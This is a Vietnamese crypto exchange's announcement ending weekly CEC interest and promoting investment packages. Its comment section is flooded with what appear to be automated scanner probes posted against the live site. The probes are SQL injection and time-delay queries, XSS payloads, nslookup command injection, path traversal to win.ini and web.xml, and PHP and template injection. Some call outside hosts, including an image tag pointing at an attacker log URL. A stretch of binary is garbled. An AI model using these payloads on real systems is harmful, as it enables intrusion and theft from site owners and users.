COINEXTRA: THÔNG BÁO VỀ CHƯƠNG TRÌNH TRẢ LÃI SUẤT CEC BONUS HÀNG TUẦN

06/07/2019 - huy
1618
184

CoinExtra trân trọng thông báo,

 

Kể từ ngày 06/07/2019, CoinExtra sẽ chính thức ngừng áp dụng Chính sách trả lãi suất hàng tuần đối với những tài khoản sở hữu từ 2.000 CEC trở lên.

 

CoinExtra xin cảm ơn quý khách hàng đã tin tưởng và sử dụng những dịch vụ, sản phẩm của sàn trong thời gian qua.

 

Để nhằm khuyến khích khách hàng tham gia Gói đầu tư CEC của sàn, trong tháng 7 chúng tôi có những ưu đãi đặc biệt như sau:

 

  •  Khách hàng tham gia gói đầu tư CEC thời hạn 90 ngày sẽ được tặng thêm 1%/gói bằng CEC Bonus.

 

  •  Khách hàng tham gia gói đầu tư CEC thời hạn 180 ngày sẽ được tặng thêm 3%/gói bằng CEC Bonus.

 

  •  Khách hàng tham gia gói đầu tư CEC thời hạn 360 ngày sẽ được tặng thêm 5%/gói bằng CEC Bonus.

 

Nếu có bất cứ thắc mắc nào vui lòng liên hệ trực tiếp với đội ngũ Support của chúng tôi hoặc gửi về email: Support@coinextra.net.

 

Trân trọng,

CoinExtra Team

Để lại bình luận của bạn
Bình luận
rwejbolu
rwejbolu
30/08/2019 14:21

1

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

response.write(9382819*9478692)

rwejbolu
rwejbolu
30/08/2019 15:28

'+response.write(9382819*9478692)+'

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

"+response.write(9382819*9478692)+"

rwejbolu
rwejbolu
30/08/2019 15:28

Yjb4yeTd

rwejbolu
rwejbolu
30/08/2019 15:28

set|set&set

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

$(nslookup TZMdMMta)

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

&nslookup fC1k01jB&'\"`0&nslookup fC1k01jB&`'

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

bpTqK6qP

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

${9999356+10000040}

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

-1 OR 2+613-613-1=0+0+0+1 --

rwejbolu
rwejbolu
30/08/2019 15:28

-1 OR 2+737-737-1=0+0+0+1

rwejbolu
rwejbolu
30/08/2019 15:28

-1' OR 2+130-130-1=0+0+0+1 --

rwejbolu
rwejbolu
30/08/2019 15:28

-1' OR 2+449-449-1=0+0+0+1 or 'yT6HbVvN'='

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

12345'"\'\");|]*{
<>�''💩

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

-1" OR 2+98-98-1=0+0+0+1 --

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

rwejbolu
rwejbolu
30/08/2019 15:28

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

rwejbolu
rwejbolu
30/08/2019 15:28

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

)

rwejbolu
rwejbolu
30/08/2019 15:28

1&n911830=v934890

rwejbolu
rwejbolu
30/08/2019 15:28

!(()&&!|*|*|

rwejbolu
rwejbolu
30/08/2019 15:28

-1; waitfor delay '0:0:3' --

rwejbolu
rwejbolu
30/08/2019 15:28

^(#$!@#$)(()))******

rwejbolu
rwejbolu
30/08/2019 15:28

-1); waitfor delay '0:0:6' --

rwejbolu
rwejbolu
30/08/2019 15:28

-1)); waitfor delay '0:0:6' --

rwejbolu
rwejbolu
30/08/2019 15:28

1 waitfor delay '0:0:6' --

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

8xV5fpEc'; waitfor delay '0:0:9' --

rwejbolu
rwejbolu
30/08/2019 15:28

D1Kc69G4'); waitfor delay '0:0:9' --

rwejbolu
rwejbolu
30/08/2019 15:28

qBe1lWGD')); waitfor delay '0:0:3' --

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

-1;select pg_sleep(3); --

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

-1);select pg_sleep(3); --

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

-1));select pg_sleep(3); --

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

v8EEeRs3';select pg_sleep(3); --

rwejbolu
rwejbolu
30/08/2019 15:28

1some_inexistent_file_with_long_name.jpg

rwejbolu
rwejbolu
30/08/2019 15:28

yoPIsYfn');select pg_sleep(6); --

rwejbolu
rwejbolu
30/08/2019 15:28

Http://testasp.vulnweb.com/t/fit.txt

rwejbolu
rwejbolu
30/08/2019 15:28

YqL7jSTb'));select pg_sleep(6); --

rwejbolu
rwejbolu
30/08/2019 15:28

http://testasp.vulnweb.com/t/fit.txt?.jpg

rwejbolu
rwejbolu
30/08/2019 15:28

679'

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

../../../../../../../../../../windows/win.ini

rwejbolu
rwejbolu
30/08/2019 15:28

C:\WINDOWS\system32\drivers\etc\hosts

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

../../../../../../../../../../windows/win.ini.jpg

rwejbolu
rwejbolu
30/08/2019 15:28

;print(md5(acunetix_wvs_security_test));

rwejbolu
rwejbolu
30/08/2019 15:28

������������������������������������������������windows��win.ini

rwejbolu
rwejbolu
30/08/2019 15:28

';print(md5(acunetix_wvs_security_test));$a='

rwejbolu
rwejbolu
30/08/2019 15:28

................windowswin.ini

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

..\..\..\..\..\..\..\..\windows\win.ini

rwejbolu
rwejbolu
30/08/2019 15:28

";print(md5(acunetix_wvs_security_test));$a="

rwejbolu
rwejbolu
30/08/2019 15:28

${@print(md5(acunetix_wvs_security_test))}

rwejbolu
rwejbolu
30/08/2019 15:28

http://testasp.vulnweb.com/t/xss.html?%00.jpg

rwejbolu
rwejbolu
30/08/2019 15:28

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

${@print(md5(acunetix_wvs_security_test))}\

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

http://hitKNMrF3kNIn.bxss.me/

rwejbolu
rwejbolu
30/08/2019 15:28

'"()

rwejbolu
rwejbolu
30/08/2019 15:28

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

rwejbolu
rwejbolu
30/08/2019 15:28

coinextra-thong-bao-2.html

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

rwejbolu
rwejbolu
30/08/2019 15:28

WEB-INF/web.xml

rwejbolu
rwejbolu
30/08/2019 15:28

WEB-INF\web.xml

rwejbolu
rwejbolu
30/08/2019 15:28

coinextra-thong-bao-2.html

rwejbolu
rwejbolu
30/08/2019 15:28

testasp.vulnweb.com

rwejbolu
rwejbolu
30/08/2019 15:28

coinextra-thong-bao-2.html/.

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

rwejbolu
rwejbolu
30/08/2019 15:28

/www.vulnweb.com

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

1'"()&%<acx><ScRiPt >BnKM(9277)</ScRiPt>

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

'"()&%<acx><ScRiPt >BnKM(9372)</ScRiPt>

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

1

rwejbolu
rwejbolu
30/08/2019 15:28

19841366

rwejbolu
rwejbolu
30/08/2019 15:28

1'"

rwejbolu
rwejbolu
30/08/2019 15:28

acu1112<s1﹥s2ʺs3ʹuca1112

rwejbolu
rwejbolu
30/08/2019 15:28

'"

rwejbolu
rwejbolu
30/08/2019 15:28

<!--

rwejbolu
rwejbolu
30/08/2019 15:28

\

rwejbolu
rwejbolu
30/08/2019 15:28

1����%2527%2522

rwejbolu
rwejbolu
30/08/2019 15:28

acux1507��z1��z2a�bcxuca1507

rwejbolu
rwejbolu
30/08/2019 15:28

@@Yarvt

rwejbolu
rwejbolu
30/08/2019 15:28

JyI=

rwejbolu
rwejbolu
30/08/2019 15:28

�'�"

rwejbolu
rwejbolu
30/08/2019 15:28

�''�""

rwejbolu
rwejbolu
30/08/2019 15:28

CWS000x�=�1N�@E߮��I)�@��  �HiP"D�F� G&َ7��܂�rX;!S��̛����7Jq���.�>�p�c�l��zG�ܾM�dkj�,��(��T�Jj)�"�T7$��H�D6)� x)��ؒ�\C�|�Q�Nc�b��� b_&�5 h��g�
]s��0Q�L<�6�L�_�w~�[�/[�m{����:n-����.�d1d��?6�0

rwejbolu
rwejbolu
30/08/2019 15:29

{{9999717*10000276}}

rwejbolu
rwejbolu
30/08/2019 15:29

1<ScRiPt >BnKM(9708)</ScRiPt>

rwejbolu
rwejbolu
30/08/2019 15:29

1<WRKWZH>YLJEH[!+!]</WRKWZH>

rwejbolu
rwejbolu
30/08/2019 15:29

1<script>BnKM(9508)</script>

rwejbolu
rwejbolu
30/08/2019 15:29

1<ScR<ScRiPt>IpT>BnKM(9462)</sCr<ScRiPt>IpT>

rwejbolu
rwejbolu
30/08/2019 15:29

1<ScRiPt
>BnKM(9253)</ScRiPt>

rwejbolu
rwejbolu
30/08/2019 15:29

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9325></ScRiPt>

rwejbolu
rwejbolu
30/08/2019 15:29

1<ScRiPt
>BnKM(9597)</ScRiPt>

rwejbolu
rwejbolu
30/08/2019 15:29

1<video><source onerror="javascript:BnKM(9026)">

rwejbolu
rwejbolu
30/08/2019 15:29

1<svg  

�onload=BnKM(9142);>

rwejbolu
rwejbolu
30/08/2019 15:29

1<isindex type=image src=1 onerror=BnKM(9045)>

rwejbolu
rwejbolu
30/08/2019 15:29

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9461'>

rwejbolu
rwejbolu
30/08/2019 15:29

1<body onload=BnKM(9056)>

rwejbolu
rwejbolu
30/08/2019 15:29

1<img src=//testasp.vulnweb.com/t/dot.gif onload=BnKM(9011)>

rwejbolu
rwejbolu
30/08/2019 15:30

1<img src=xyz OnErRor=BnKM(9700)>

rwejbolu
rwejbolu
30/08/2019 15:30

1<img/src=">" onerror=alert(9361)>

rwejbolu
rwejbolu
30/08/2019 15:30

%31%3C%53%63%52%69%50%74%20%3E%42%6E%4B%4D%289982%29%3C%2F%73%43%72%69%70%54%3E

rwejbolu
rwejbolu
30/08/2019 15:30

1\u003CScRiPt\BnKM(9053)\u003C/sCripT\u003E

rwejbolu
rwejbolu
30/08/2019 15:30

1&lt;ScRiPt&gt;BnKM(9077)&lt;/sCripT&gt;

rwejbolu
rwejbolu
30/08/2019 15:30

�<img acu onmouseover=BnKM(9575) //�>

rwejbolu
rwejbolu
30/08/2019 15:30

1<input autofocus onfocus=BnKM(9711)>

rwejbolu
rwejbolu
30/08/2019 15:30

<a HrEF=http://www.vulnweb.com></a>

rwejbolu
rwejbolu
30/08/2019 15:30

<a HrEF=jaVaScRiPT:>

rwejbolu
rwejbolu
30/08/2019 15:30

[url=http://www.vulnweb.com][/url]

rwejbolu
rwejbolu
30/08/2019 15:30

1<img<!-- --> src=x onerror=alert(9414);//><!-- -->

rwejbolu
rwejbolu
30/08/2019 15:30

1}body{acu:Expre/**/SSion(BnKM(9958))}

rwejbolu
rwejbolu
30/08/2019 15:30

1<% contenteditable onresize=BnKM(9677)>

rwejbolu
rwejbolu
30/08/2019 15:30

1JTTWM
<ScRiPt >BnKM(9474)</ScRiPt>

rwejbolu
rwejbolu
30/08/2019 15:30

1<WTWJE5>2BRRN[!+!]</WTWJE5>

rwejbolu
rwejbolu
30/08/2019 15:30

1<ifRAme sRc=9341.com></IfRamE>

rwejbolu
rwejbolu
30/08/2019 15:30

1<ub9J35 x=9890>

rwejbolu
rwejbolu
30/08/2019 15:30

1<img sRc='http://attacker-9883/log.php?